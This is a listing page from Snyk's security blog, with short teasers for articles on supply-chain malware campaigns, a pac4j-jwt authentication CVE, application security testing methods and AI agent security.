Skip to main content

Articles

Stay informed on security insights and best practices from Snyk’s leading experts.

Anzeige 1 - 20 von 371 artikel

Inside StegaBin: How a DPRK Steganography Campaign Generated Headlines

North Korean hackers published 26 malicious npm packages using Pastebin steganography for C2. It made headlines everywhere. We checked the data: zero real-world impact. Here's what the campaign actually did, and what it tells us about the real risk of malicious package campaigns.

CVE-2026-29000: How a Public Key Breaks Authentication in pac4j-jwt

CVE-2026-29000 is a CVSS 10.0 authentication bypass in pac4j-jwt that lets attackers forge admin tokens using only the server's RSA public key. Learn how the vulnerability works, whether you're affected, and how to fix it.

Accelerating Public Sector Modernization with Secure AI-Driven Migration

Learn how generative AI accelerates legacy application migration for the public sector—and how Snyk secures AI-generated code, dependencies, containers, and cloud infrastructure from code to cloud.

DAST vs. Penetration Testing: 5 Key Differences

Deciding between DAST and penetration testing is vital for securing modern APIs and microservices. Learn how to combine these methodologies to build a robust, layered security strategy that protects your entire application portfolio.

Top 8 Claude Skills for UI/UX Engineers

Explore the top Claude Skills transforming UI/UX engineering by automating repetitive tasks like accessibility audits and component scaffolding. Discover how to streamline your workflow and focus on the creative decisions that truly matter.

Top 8 Claude Skills for Developers

From Manus-style task planning to Terraform code generation and Core Web Vitals optimization, these 8 Claude Skills give developers repeatable AI-powered workflows for real engineering work.

Six Principles for Rethinking DevSecOps for AI

The 6 factors are: Developer-First AI Security, Secure AI by Design, Shared AI Accountability, Automated AI Security, AI-Specific Intelligence, and AI Governance & Continuous Improvement

Your AI "Skills" Are the New Agentic Attack Surface

As AI moves beyond simple chat to autonomous execution, the skills powering these agents have emerged as a dangerous new attack surface. Learn how to protect your organization from malicious AI agent tools while maintaining development velocity in the age of agentic workflows.

Anthropic Just Launched Claude Code Security. Here's Why That's Great News for the Industry

Anthropic's launch of Claude Code Security is sparking headlines about the end of traditional security, but the real story is about the shift from detection to automated remediation. This move validates a layered security approach that combines AI reasoning with deterministic analysis to protect the modern software supply chain.

Building Safer AI Agents with Structured Outputs

Learn how structured outputs help developers build safer, more reliable AI agents by enforcing strict schemas during token generation. Discover the essential frameworks and security tools needed to move your AI agents to an enforcement-based production environment.

Top 8 Claude Skills for Finance and Quantitative Developers

Quantitative finance is evolving as algorithmic traders shift from AI skepticism to practical automation using Claude Skills. Learn how to leverage the latest Claude Skills and security best practices to reclaim mental bandwidth for high-level financial judgment.

SAST vs. DAST vs. IAST vs. RASP: Understanding Application Security Testing Methods

Navigate the key differences between SAST, DAST, IAST, and RASP. This guide explains how to integrate these testing methods throughout the software development lifecycle to eliminate blind spots and block real-time attacks.

BOLA: The API Vulnerability Hiding in Plain Sight

Discover why Broken Object Level Authorization (BOLA) is the #1 OWASP API risk. Learn why traditional testing tools fail to test this "hidden" flaw properly and how Snyk’s AI-powered DAST provides the context needed to stop data breaches.

Your Clawdbot (OpenClaw) AI Assistant Has Shell Access and One Prompt Injection Away from Disaster

Is your personal AI assistant secure? Dive into the agentic security risks of Clawdbot: prompt injection, supply chain, and network exposure. Discover Snyk's tools to secure your agents.

How AI Agents Still Break Security When Nothing Is Broken

AI agents can fail security without any bugs or vulnerabilities. Learn why agent behavior breaks trust boundaries and how threat modeling mitigates risk.

4 Reasons Why Dynamic Security Testing Is Critical For All Your Assets

Attackers don't just target your crown jewels; they look for the weakest link in your entire application footprint. Limiting dynamic security testing to tier-one apps leaves dangerous blind spots across forgotten APIs and internal tools. Discover why universal DAST is critical for modern risk management and how it helps teams uncover hidden vulnerabilities before they become entry points for a breach.

Inside the 'clawdhub' Malicious Campaign: AI Agent Skills Drop Reverse Shells on OpenClaw Marketplace

Snyk security researchers have uncovered the clawdhub malicious campaign targeting the ClawHub AI marketplace with Trojanized skills that drop reverse shells. This sophisticated attack uses social engineering and obfuscated scripts to compromise hosts via AI agent capabilities on Windows and macOS. Learn how to identify these threats and secure your AI supply chain against evolving agentic workflow risks.

Secure at Inception: Das neue Mandat für KI-gestützte Software-Entwicklung

Klassische Sicherheitsverfahren können mit KI-gestützter Entwicklung nicht Schritt halten. Gefragt ist eine proaktive Methodik, wie Snyk sie mit „Secure at Inception“ bietet. Erfahren Sie, wie Sie damit KI-generierten Code-Schwachstellen vorbeugen und Backlogs durch agiles Fixing mit KI abbauen.

Catch Vulnerabilities Early: Your Snyk MCP Cheat Sheet

Integrate security into AI workflows with the Snyk MCP Server cheat sheet. Learn installation, configuration, transport types, core security scanning functions (Code, SCA, IaC), and rules for agentic AI tools.

OWASP AI Exchange: a practical, “one-stop” guide to securing AI (not just GenAI)

The OWASP AI Exchange is a comprehensive open source guide for securing all AI systems, bridging the gap between traditional AppSec and modern machine learning threats. Use this practical resource to implement the G.U.A.R.D. starter plan and scale your AI security program with confidence.